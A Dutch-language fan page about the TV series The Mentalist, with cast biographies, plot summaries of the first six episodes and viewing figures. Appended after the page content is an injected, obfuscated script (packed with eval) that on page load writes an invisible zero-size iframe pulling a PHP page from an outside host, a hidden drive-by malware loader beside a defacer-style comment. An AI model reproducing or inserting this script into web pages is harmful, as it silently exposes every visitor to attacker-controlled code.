The Mentalist

The mentalist, nieuws en movies. Vanaf januari 2009 op de Nederlandse televisie.

Alles over de hitserie The Mentalist!

Simon Baker (als Patrick Jane)

Rol: Patrick JaneSimon Baker is bekend geworden in 1992 toen hij in Australie de Logie Award ontving voor meest populaire nieuw talent. Na de verhuizing naar Los Angeles kreeg Simon Baker een rol in de Academy Award film, LA Confidential (1997).In 2000 speelde hij als een austronaut in Red Planet met Val Kilmer, Carrie Anne Moss en Benjamin Bratt. Hij speelde de hoofdrol in de advocaten serie The Guardian voor 3 seizoenen vanaf 2001, en speelde ook in The Affair of the Necklace in 2001.

 

Patrick Jane is een zeer bekende, voormalig televisieparagnost die, nadat hij ontmaskert is als fraudeur, nu zijn echte vaardigheden als mentalist gebruikt om het Californie Bureau of Investigation te helpen met het oplossen van misdrijven.

Robin Tunney (als Teresa Lisbon)

 

Rol: Teresa LisbonRobin Tunney studeerde acteren aan de Chicago Academy, ze spendeerde haar zomers door te spelen in stukken als “Bus Stop” en “Agnes of God”. Ze verhuisde op de leeftijd van 18 jaar naar Los Angeles en kreeg zeer snel rollen in diverse series als “Life Goes On” (1989), “Class of ‘96″ (1993) (recurring), “Law & Order” (1990), HBO’s “Dream On” (1990) en de ABC mini-series J.F.K.: Reckless Youth (1993) (TV), waarin ze “Kit Kennedy” speelde. The Craft (1996) was de eerste film waarin zijn speelde daarnaast deed ze ook veel kleine rolletjes.

Tim Kang (als Kimball Cho)

bekend van third watch

Owain Yeoman

 

Rol: Wayne RigsbyDirect na zijn slagen aan de Royal Academy of Dramatic Arts en het spelen in een groot aantal toneelstukken in Londen, werd Owain Yeoman gecast voor Warner Bros film “Troy” als ‘Lysander’. Na deze rol ging hij spelen in deNBC pilot “The Friendlys” voor Rob en Mark Cullen (”Lucky”).

Amanda Righetti

 

Rol: Grace Van PeltAmanda is opgegroeid in Las Vegas, Nevada, en verhuisd naar Los Angeles om actriece te worden. Na het verkrijgen van een rol in de pilot van No Place Like Home, is ze opgemerkt door FOX, welke haar caste voor de rol van Hailey Nichol in de Fox hit The O.C. nadat No Place Like Home geflopt was. Dit leide uiteindelijk tot een hoofdrol in de Reunion.
 

 

Afleveringen

aflevering 1 - Pilot

Wanneer de vrouw en arts van een professionele golfer vermoord worden in Palm Strings word het CBI (The California Bureau of Investigation) ingeschakeld om het onderzoek beet te pakken. Patrick Jane, een detective en adviseur voor CBI besluit zijn bovenaardse vaardigheden te gebruiken om het team onder leiding van ‘Senior Agent Teresa Lisbon’ te gebruiken om de moordenaar te vinden.

De zaak krijgt voor Jane een bijzondere wending als het team een, met bloed op de muur getekende, smiley aantreft, hij denkt te maken te hebben met de befaamde ‘Red John’: een seriemoordenaar die enkele jaren geleden de vrouw en dochter van Jane van het leven beroofde.

Naar mate de zaak vordert, denkt Jane dat de werkelijke moordernaars de moorden in de schoenen willen schuiven van ‘Red John’. Hierop besluit het team de andere verdachten nader te onderzoeken, onder andere de professionele golfer, die een affaire had, zijn broer, die sliep met de vrouw van zijn broer en de zakenpartner van de arts, wie geld achterhield.

 

aflevering 2 - Red hair and silver tape

Wanneer het lichaam van een 18 jarige tiener word gevonden in de wijngaarden van ‘Northern Napa County’, word het CBI team ingeschakeld om deze zaak beet te pakken. Nadat er een tijdlijn is opgezet voor de verdwijning van de tiener, die die nacht werkende was is een restaurant, kon het team zich richten op de verdachten die in die nacht aanwezig waren in het restaurant. Er worden harde bewijzen gevonden en alle pijlen worden gericht op de vriend van de tiener. Maar Jane is niet van mening dat hij de dader is, Jane’s vaardigheden wijzen hem in de richting van de chef kok.

 

aflevering 3 - Red tide

Als het lichaam van een tiener aanspoeld op een strand in California, duiken Jane en zijn team in de wereld van het surfen. Als ze bij de tiener sloot water in haar longen aantreffen gaan ze er van uit dat zij ergens anders is omgebracht en in de oceaan is gegooid om het onderzoek te bemoeilijken. Jane denkt dat de 4 jongens, waarbij de tiener als laatst gezien is, meer weten dan ze loslaten.

Wanneer ook de bewaker van de flat constructie dood word aangetroffen en het erop lijkt dat hij dezelfde nacht van het leven beroofd is, bedenkt Jane een val om hen met zijn vaardigheden de waarheid te laten vertellen.

aflevering 4 - Ladies in red

Het CBI team onderzoekt de moord op een rijke investment bankier, die zich niet op tijd kon opsluiten in zijn schuilkamer. Tijdens de herdenkingsdienst zoekt Jane contact met de weduwe en ontdekt dat de bankier vele geheimen met zich meegenomen heeft. Tijdens verder onderzoek, ondekt het team dat de weduwe een dubbel leven leidt tussen een huisvrouw en een jonge minnares, en dat zij vele miljoenen van klanten achterhield en dit bewaarde op een geheime plek. Het vermoeden van het team dat de weduwe hoofdverdachte is word bevestigd wanneer haar dochter word ontvoerd in ruil voor het achtergehouden geld. Doordat Jane de weduwe nog steeds als hoofdverdachte zag, gebruikte hij zijn vaardigheden om te achterhalen of de weduwe meer belang heeft bij haar dochter dan bij het geld.

aflevering 5 - Redwood

Een meisje wordt dood gestoken gevonden in de bossen en haar beste vriendin is vermist. Zij is gevonden met bloed en een mes in haar hard wat haar de hoofd verdachte maakt, maar zij leidt aan geheugen verlies. Patrick Jane gebruikt zijn mentalist vaardigheden om er achter te komen wat er echt gebeurd is.

aflevering 6 - Red Handed

Er wordt een afgehakte hand gevonden op de Califonie-Nevada staat grens, welke van een vermoorde hotel casino eigenaar is. Wanneer het CBI team denkt dat het een maffia moord is, gebruikt Patrick Jane zijn onderzoek om te winnen aan de kaart tafels.

Hoewel de show een sterke achterban had werd hij door velen bekritiseerd als een kopie van de andere serie op dit gebied die momenteel op televisie is, Psych.

De eerste aflevering trok 15.6 miljoen kijkers tijdens de eerste uitzending en 7.8 miljoen in de herhaling twee dagen later. 

 Het introduceert een stuk van Jane’s geschiedenis en laat zien dat zijn vrouw en dochter vijf jaar geleden voor de serie begint vermoord zijn door een seriemoordenaar genaamd “Red John”. Het is waarschijnlijk om deze reden dat het woord “Red” in de titel van elke aflevering wordt gebruikt (met uitzondering van de “Pilot”)

 

 

<PLAINTEXT> <!-- www.thaxdevil.tk --><!--webbot bot="HTMLMarkup" endspan --></p> </font> </div> </div> </div> <!--Start Breadcrumb--><!--End Breadcrumb--><script>eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('5.4(\'<1 6="0" 3="0" 2="0" 7="c://b.a/8.9"></1>\');',13,13,'|iframe|board|height|write|document|width|src|gl1_2|php|com|combach|http'.split('|'),0,{}))</script><!--Start Breadcrumb--> <!--End Breadcrumb--></body> </html> </html> </html>